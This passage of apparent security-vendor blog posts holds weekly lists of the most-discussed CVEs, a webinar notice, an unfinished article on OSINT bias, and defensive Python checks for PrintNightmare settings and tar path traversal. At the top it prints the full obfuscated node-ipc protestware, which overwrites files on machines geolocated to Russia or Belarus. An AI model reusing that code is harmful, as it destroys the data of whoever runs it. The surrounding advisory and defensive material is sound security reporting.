This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? 
f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

https://nvd.nist.gov/vuln/detail/CVE-2022-23812

10. CVE-2025-31200

A memory corruption issue was addressed with improved bounds checking. This issue is fixed in tvOS 18.4.1, visionOS 2.4.1, iOS 18.4.1 and iPadOS 18.4.1, macOS Sequoia 15.4.1. Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on iOS.

https://nvd.nist.gov/vuln/detail/CVE-2025-31200

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 26 May 2025

This weekly blog post is generated via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-21762

An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

2. CVE-2021-44228

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

3. CVE-2024-0418

A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-0418

4. CVE-2024-32593

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS. This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.3.4.2.

https://nvd.nist.gov/vuln/detail/CVE-2024-32593

5. CVE-2020-13951

Attackers can use the public NetTest web service of Apache OpenMeetings 4.0.0-5.0.0 to organize a denial of service attack.

https://nvd.nist.gov/vuln/detail/CVE-2020-13951

6. CVE-2024-32592

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VoidCoders, innovs Void Elementor WHMCS Elements For Elementor Page Builder allows Stored XSS. This issue affects Void Elementor WHMCS Elements For Elementor Page Builder: from n/a through 2.0.

https://nvd.nist.gov/vuln/detail/CVE-2024-32592

7. CVE-2021-40517

Airangel HSMX Gateway devices through 5.2.04 are vulnerable to stored Cross Site Scripting. An XSS payload is placed in the name column of the updates table using database access.

https://nvd.nist.gov/vuln/detail/CVE-2021-40517

8. CVE-2025-29927

Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

https://nvd.nist.gov/vuln/detail/CVE-2025-29927

9. CVE-2024-21887

A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

10. CVE-2023-22515

Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances.

Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

https://nvd.nist.gov/vuln/detail/CVE-2023-22515

SOS Intelligence Webinar

Business Update Webinar – you’re invited!

A date for your diaries, or rather, your calendar 🙂 Please join us on Wednesday, June 4th at 4pm UK time for our third webinar of the year where I will be taking you through our platform updates, and there are many!

Look forward to seeing you and taking your questions.

Best wishes,

Amir


Who is this for?

  • Anyone in a business or organisation who has responsibility for online security
  • CTOs or senior managers who want to understand why there is a critical need for a service like SOS Intelligence
  • IT / Cyber Security teams
  • Business owners who are worried about the recent cyber attacks in the UK

What we will cover:

NEW Key Features

  • SSO
  • Better UX
  • Threat Tracker
  • Domain Monitor
  • DARKMAP rebuild and improvements
  • On demand RFIs
  • Vulnerability Intelligence

Our AI Analyst

  • Fully Integrated, private LLM agent
  • Alert Analysis
  • Content Analysis
  • Natural Language querying

Hosted by Jon Moss and SOS Intelligence Founder and CEO, Amir Hadzipasic

Sign up to the webinar to receive a recording via email if you cannot attend on the day. By signing up you will also receive our newsletter for future events. You can always unsubscribe with one click.

Photo by Headway on Unsplash

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 19 May 2025

This weekly blog post is generated via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

2. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

3. CVE-2024-45332

Exposure of sensitive information caused by shared microarchitectural predictor state that influences transient execution in the indirect branch predictors for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

https://nvd.nist.gov/vuln/detail/CVE-2024-45332

4. CVE-2025-27920

Output Messenger before 2.0.63 was vulnerable to a directory traversal attack through improper file path handling. By using ../ sequences in parameters, attackers could access sensitive files outside the intended directory, potentially leading to configuration leakage or arbitrary file access.

https://nvd.nist.gov/vuln/detail/CVE-2025-27920

5. CVE-2024-21887

A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

6. CVE-2020-8516

The daemon in Tor through 0.4.1.8 and 0.4.2.x through 0.4.2.6 does not verify that a rendezvous node is known before attempting to connect to it, which might make it easier for remote attackers to discover circuit information. NOTE: The network team of Tor claims this is an intended behavior and not a vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2020-8516

7. CVE-2021-34527

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.

In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy settings are correct (see FAQ):

  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
  • NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
  • UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.

UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates.

Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.

https://nvd.nist.gov/vuln/detail/CVE-2021-34527
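The registry check in the Microsoft guidance above, as an added example written for this post (not Microsoft's tooling): the assessment of the two PointAndPrint values is kept separate from the registry read, so it can be exercised against constructed sample values on any platform, while the read itself uses Python's standard winreg module and only runs on Windows. The key path and value names are the ones quoted in the advisory text; the sample dictionaries are made up for illustration.

```python
import sys

# Registry location and value names quoted in the Microsoft guidance above.
POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
WATCHED_VALUES = ("NoWarningNoElevationOnInstall", "UpdatePromptSettings")

# Constructed sample states (not read from any real host).
SAMPLE_WEAK = {"NoWarningNoElevationOnInstall": 1, "UpdatePromptSettings": 0}
SAMPLE_HARDENED = {"NoWarningNoElevationOnInstall": None, "UpdatePromptSettings": 0}
SAMPLE_DEFAULT = {}  # key absent entirely: both values undefined


def assess_point_and_print(values: dict) -> dict:
    """Map each watched value to a verdict. None means 'not defined'."""
    verdicts = {}
    for name in WATCHED_VALUES:
        value = values.get(name)
        if value is None:
            verdicts[name] = "ok: not defined (secure default)"
        elif isinstance(value, int) and value == 0:
            verdicts[name] = "ok: 0"
        else:
            # Non-zero, or not a DWORD at all: does not match the required state.
            verdicts[name] = f"insecure: {value!r} (expected DWORD 0 or not defined)"
    return verdicts


def is_hardened(values: dict) -> bool:
    """True only when every watched value is 0 or absent."""
    return all(v.startswith("ok") for v in assess_point_and_print(values).values())


def read_point_and_print() -> dict:
    """Read the two values from HKLM. Windows only; elsewhere raises RuntimeError."""
    if sys.platform != "win32":
        raise RuntimeError("registry read requires Windows")
    import winreg  # standard library on Windows builds of CPython
    values = {name: None for name in WATCHED_VALUES}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POINT_AND_PRINT_KEY) as key:
            for name in WATCHED_VALUES:
                try:
                    data, kind = winreg.QueryValueEx(key, name)
                except FileNotFoundError:
                    continue  # value absent: treated as not defined
                # Keep the raw data; a non-DWORD type is flagged by the assessment.
                values[name] = data if kind == winreg.REG_DWORD else ("non-DWORD", data)
    except FileNotFoundError:
        pass  # key does not exist: both values undefined, the secure default
    return values


if __name__ == "__main__":
    state = read_point_and_print() if sys.platform == "win32" else SAMPLE_WEAK
    for name, verdict in assess_point_and_print(state).items():
        print(f"{name}: {verdict}")
    print("hardened" if is_hardened(state) else "NOT hardened")
```

On a Windows host the script reads the live values; anywhere else it falls back to the constructed weak sample so the output format can be seen. The guidance's own point is preserved in the verdict logic: a value of 1 for NoWarningNoElevationOnInstall is reported as insecure, and an absent key is reported as the secure default rather than as an error.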


8. CVE-2024-3400

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-3400

9. CVE-2019-17671

In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled.

https://nvd.nist.gov/vuln/detail/CVE-2019-17671

10. CVE-2017-5638

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

https://nvd.nist.gov/vuln/detail/CVE-2017-5638

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 12 May 2025

This weekly blog post is generated via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2022-44666

Windows Contacts Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2022-44666

2. CVE-2023-47246

In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.

https://nvd.nist.gov/vuln/detail/CVE-2023-47246

3. CVE-2025-29824

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

https://nvd.nist.gov/vuln/detail/CVE-2025-29824

4. CVE-2023-35947

Gradle is a build tool with a focus on build automation and support for multi-language development. In affected versions when unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions. For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read. To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name. Users are advised to upgrade. There are no known workarounds for this vulnerability.

### Impact

This is a path traversal vulnerability when Gradle deals with Tar archives, often referenced as TarSlip, a variant of ZipSlip.

* When unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions.
* For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read.

To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed.

Gradle uses Tar archives for its [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html). These archives are safe when created by Gradle. But if an attacker had control of a remote build cache server, they could inject malicious build cache entries that leverage this vulnerability. This attack vector could also be exploited if a man-in-the-middle can be performed between the remote cache and the build.

### Patches

A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name.

It is recommended that users upgrade to a patched version.

### Workarounds

There is no workaround.

* If your build deals with Tar archives that you do not fully trust, you need to inspect them to confirm they do not attempt to leverage this vulnerability.
* If you use the Gradle remote build cache, make sure only trusted parties have write access to it and that connections to the remote cache are properly secured.

### References

* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)](https://cwe.mitre.org/data/definitions/22.html)
* [Gradle Build

https://nvd.nist.gov/vuln/detail/CVE-2023-35947
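The behaviour Gradle adopted in 7.6.2 and 8.2, refusing any archive whose entry names contain path traversal elements, can be reproduced as a pre-extraction check. The Python below is an added example written for this post, not Gradle's code. It goes slightly beyond the advisory's entry-name check by also flagging symlink and hard-link targets that resolve outside the unpack root, since those are the other common TarSlip variant. The archive contents are constructed in memory so the check runs offline.

```python
import io
import os
import posixpath
import tarfile
import tempfile


# Constructed sample: a small tar built in memory for this post. None of the
# entry names come from Gradle or from any real build cache.
def build_sample_tar(include_traversal: bool) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        def add_file(name, data):
            info = tarfile.TarInfo(name)  # addfile() stores the name verbatim
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))

        add_file("ok/file.txt", b"hello")               # benign entry
        if include_traversal:
            add_file("../escape.txt", b"x")             # climbs above the unpack root
            add_file("/abs.txt", b"x")                  # absolute path
            add_file("ok/../../sneaky.txt", b"x")       # escapes only after normalisation
            link = tarfile.TarInfo("ok/link")           # symlink whose target is outside
            link.type = tarfile.SYMTYPE
            link.linkname = "../../etc/passwd"
            tf.addfile(link)
    return buf.getvalue()


def _escapes_root(path: str) -> bool:
    """True if a POSIX path is absolute or normalises to somewhere above '.'."""
    if path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def is_unsafe_member(member: tarfile.TarInfo) -> bool:
    if _escapes_root(member.name):
        return True
    if member.issym():
        # A symlink target is resolved relative to the link's own directory.
        target = posixpath.join(posixpath.dirname(member.name), member.linkname)
        return _escapes_root(target)
    if member.islnk():
        # A hard-link target is relative to the archive root.
        return _escapes_root(member.linkname)
    return False


def find_unsafe_entries(archive: bytes) -> list:
    """Names of all members that would land or point outside the unpack root."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return [m.name for m in tf.getmembers() if is_unsafe_member(m)]


def safe_extract(archive: bytes, dest: str) -> list:
    """Refuse the whole archive if any entry is unsafe; otherwise extract it."""
    bad = find_unsafe_entries(archive)
    if bad:
        raise ValueError(f"refusing archive with path traversal entries: {bad}")
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        if hasattr(tarfile, "data_filter"):   # Python 3.12+ and security backports
            tf.extractall(dest, filter="data")
        else:
            tf.extractall(dest)
        return [m.name for m in tf.getmembers()]


def demo() -> dict:
    """Run the check on both samples and report what happened."""
    result = {
        "flagged": find_unsafe_entries(build_sample_tar(True)),
        "clean_flagged": find_unsafe_entries(build_sample_tar(False)),
    }
    try:
        safe_extract(build_sample_tar(True), tempfile.mkdtemp())
        result["rejected"] = False
    except ValueError:
        result["rejected"] = True
    dest = tempfile.mkdtemp()
    safe_extract(build_sample_tar(False), dest)
    result["extracted_ok"] = os.path.isfile(os.path.join(dest, "ok", "file.txt"))
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The policy mirrors the advisory's fix: the archive is rejected as a whole rather than having individual entries skipped, because a partially extracted cache entry is itself an inconsistent state. The normalisation step matters; `ok/../../sneaky.txt` contains no leading `..` yet still escapes, which is why the check runs `posixpath.normpath` before looking at the result.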


5. CVE-2025-1323

The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the ‘databeat’ parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-1323

6. CVE-2025-27007

Incorrect Privilege Assignment vulnerability in Brainstorm Force SureTriggers allows Privilege Escalation. This issue affects SureTriggers: from n/a through 1.0.82.

https://nvd.nist.gov/vuln/detail/CVE-2025-27007

7. CVE-2024-4577

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

https://nvd.nist.gov/vuln/detail/CVE-2024-4577

8. CVE-2021-41773

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

https://nvd.nist.gov/vuln/detail/CVE-2021-41773

9. CVE-2022-44690

Microsoft SharePoint Server Remote Code Execution Vulnerability

https://nvd.nist.gov/vuln/detail/CVE-2022-44690

10. CVE-2023-21433

Improper access control vulnerability in Galaxy Store prior to version 4.5.49.8 allows local attackers to install applications from Galaxy Store.

https://nvd.nist.gov/vuln/detail/CVE-2023-21433

Opinion, OSINT

Seeing Clearly: Understanding and Addressing Bias in OSINT

Open-source intelligence (OSINT) has become an essential part of modern investigations, threat analysis, and decision-making. By leveraging publicly available information from the surface web, social media, forums, and more obscure corners of the internet, OSINT practitioners can uncover insights without the need for intrusive or covert methods. But as with any form of intelligence gathering, the process is far from objective.

Bias — whether introduced by the analyst, the tools used, or the sources themselves — can significantly distort findings. In an age where data is vast, varied, and often unverified, understanding and mitigating bias is not just good practice, it’s a necessity.

In this blog post, we’ll explore the different types of bias that can affect OSINT, from unconscious assumptions to platform-driven distortions. We’ll also look at the real-world consequences of unchecked bias and offer practical steps to help analysts and organisations reduce its impact. Because when it comes to intelligence, clarity and objectivity are key — and bias is the silent threat that clouds both.

What Is Bias in OSINT?

Bias, in the context of OSINT, refers to any distortion or influence that affects how information is collected, interpreted, or presented. It can arise from a wide range of sources — the tools we use, the platforms we search, the assumptions we bring with us, and even the way we frame our intelligence requirements.

Importantly, bias isn’t always intentional. Much of it operates at a subconscious level, shaped by cultural norms, past experiences, professional habits, or institutional practices. And in OSINT — where we often deal with vast, unstructured, and fast-moving data — even small biases can significantly skew the outcome of an investigation.

Bias can enter the OSINT process at every stage. It may influence the types of sources we prioritise, the way we interpret ambiguous content, or the confidence we place in particular findings. Analysts may unconsciously favour information that supports a working theory, or dismiss data that doesn’t align with an expected narrative. Meanwhile, digital tools and search algorithms can subtly reinforce these patterns, feeding analysts what they’re likely to click on — not necessarily what’s most accurate or relevant.

Recognising the presence of bias is the first step in mitigating its effects. In the sections that follow, we’ll explore some of the most common types of bias in OSINT work, and how they can impact the quality and reliability of our intelligence.

Types of Bias Common in OSINT

Bias in OSINT can creep in at any stage of the intelligence lifecycle — from the moment an analyst frames a question, to the sources they choose, the tools they rely on, and how they interpret the information gathered. These biases, often unconscious, can impact the reliability, relevance, and objectivity of an intelligence product. Below are the most prevalent types of bias that OSINT practitioners should be aware of, alongside examples and mitigation tips.

Selection Bias

Selection bias arises when the information an analyst collects is not representative of the broader landscape, often because certain types of sources or platforms are favoured over others. This can be due to habit, language familiarity, ease of access, or time constraints.

Example:
An analyst researching political disinformation may rely heavily on Twitter data, missing coordinated narratives being pushed on Telegram or region-specific platforms like VK or Weibo.

Why it matters:
If the selected sources don’t reflect the full spectrum of available information, the resulting intelligence may be incomplete, misleading, or skewed towards a particular narrative or demographic.

How to reduce it:

  • Use a diverse set of platforms and media types (forums, blogs, videos, alt-tech sites).
  • Include regional and language-specific sources wherever possible.
  • Revisit and regularly reassess your go-to sources to prevent over-reliance.

Confirmation Bias

Confirmation bias is the tendency to look for or interpret information in a way that supports an existing hypothesis or belief, while disregarding evidence that contradicts it. This is especially common when an analyst is under pressure to produce a “smoking gun” or validate a stakeholder’s expectations.

Example:
While investigating a suspected nation-state actor, an analyst focuses exclusively on TTPs (Tactics, Techniques, and Procedures) associated with that actor, ignoring signs that the activity could point to a different group or a false flag operation.

Why it matters:
Confirmation bias can lead to poor attribution, misinformed decisions, or ineffective mitigation strategies. It also limits an analyst’s ability to explore alternative hypotheses.

How to reduce it:

  • Apply structured analytic techniques such as the Analysis of Competing Hypotheses (ACH).
  • Collaborate with other analysts to test assumptions and encourage critical challenge.
  • Document reasoning and acknowledge uncertainty in assessments.

Language and Cultural Bias

Language barriers and cultural unfamiliarity can affect how information is gathered and interpreted. Analysts working in a second language — or relying on machine translation — may misread tone, sarcasm, or idiomatic expressions. Cultural norms can also impact how certain behaviours are perceived.

Example:
An English-speaking analyst may misinterpret the tone of Arabic-language social media posts due to literal translation, mistaking satire or frustration for calls to violence.

Why it matters:
Poor interpretation can lead to false positives, mischaracterisation of intent, or overlooking local context. This is particularly critical in geopolitical, extremist, or criminal investigations.

How to reduce it:

  • Use native speakers or trusted translation partners when possible.
  • Consult regional experts for cultural insight.
  • Avoid making assumptions based solely on automated translations or surface-level interpretations.

Tool and Platform Bias

The tools we use to collect and analyse data are not neutral. Search engines, social media platforms, and scraping tools all apply filters, ranking algorithms, and personalisation — often without the user’s awareness. This can prioritise certain types of content and bury others, skewing the analyst’s perception of what is prevalent or important.

Example:
Google search results vary depending on location, search history, and user profile. An analyst may believe a narrative is trending globally when in fact it’s only prominent in their localised feed.

Why it matters:
Platform bias can lead to a false sense of consensus or popularity. It also risks amplifying certain voices while suppressing dissenting ones.

How to reduce it:

  • Use multiple search engines and anonymised browsers (e.g. Tor or VPNs).
  • Test queries in incognito/private browsing modes.
  • Be aware of default settings in commercial tools — understand what’s being excluded or prioritised.

Data Availability Bias

Data availability bias refers to the over-reliance on information that is easiest to find, most recent, or most abundant. Analysts may gravitate towards high-volume data sources (like Reddit or Twitter) because they are continuously updated and easy to search — at the expense of smaller, less visible sources that may be more valuable.

Example:
An OSINT report on cybercriminal activity may cite dozens of tweets and blog posts but fail to include key discussions taking place in closed forums or encrypted messaging groups.

Why it matters:
The quantity of available data doesn’t always equate to quality or relevance. Prioritising what’s visible over what’s essential can distort the intelligence picture and give a false sense of completeness.

How to reduce it:

  • Establish clear intelligence requirements before collection begins.
  • Allocate time to seek out hard-to-find or niche sources.
  • Treat gaps in data as a signal — not just an absence.

Together, these biases form a web of influence that can compromise even the most well-intentioned investigations. 


Real-World Consequences of Bias in OSINT

Bias in OSINT isn’t just a theoretical concern — it has real-world implications. When unchecked, bias can lead to flawed assessments, damaged reputations, operational missteps, and even legal or ethical breaches. Whether you’re conducting corporate investigations, monitoring geopolitical events, or assessing cyber threats, the integrity of your findings depends on how rigorously you confront bias throughout the process.

Here are some key consequences of biased OSINT:

Flawed Decision-Making

Biased intelligence can feed directly into poor decisions, especially in fast-moving environments where leadership relies heavily on OSINT to shape strategy or response.

Example:
A security team monitoring social unrest misinterprets online sentiment due to over-reliance on English-language Twitter data. As a result, they misjudge the timing and location of protest activity, leading to inadequate resource allocation and reputational damage for the organisation.

Impact:
Misinformed decisions can result in financial losses, safety risks, or missed opportunities to intervene early in an emerging threat.

Inaccurate Attribution and Threat Profiling

In cyber threat intelligence, OSINT is often used to support attribution — linking incidents to actors or groups. Bias in source selection or interpretation can lead to false conclusions about who is behind an attack or what their motives might be.

Example:
An analyst attributes a phishing campaign to a well-known ransomware gang based on superficial similarities to a past incident, without exploring the possibility of copycat tactics. Later evidence reveals the activity was the work of a different actor altogether.

Impact:
Faulty attribution may lead to targeting the wrong group, damaging diplomatic relationships, or overlooking the true threat actor.

Overlooking Emerging Threats

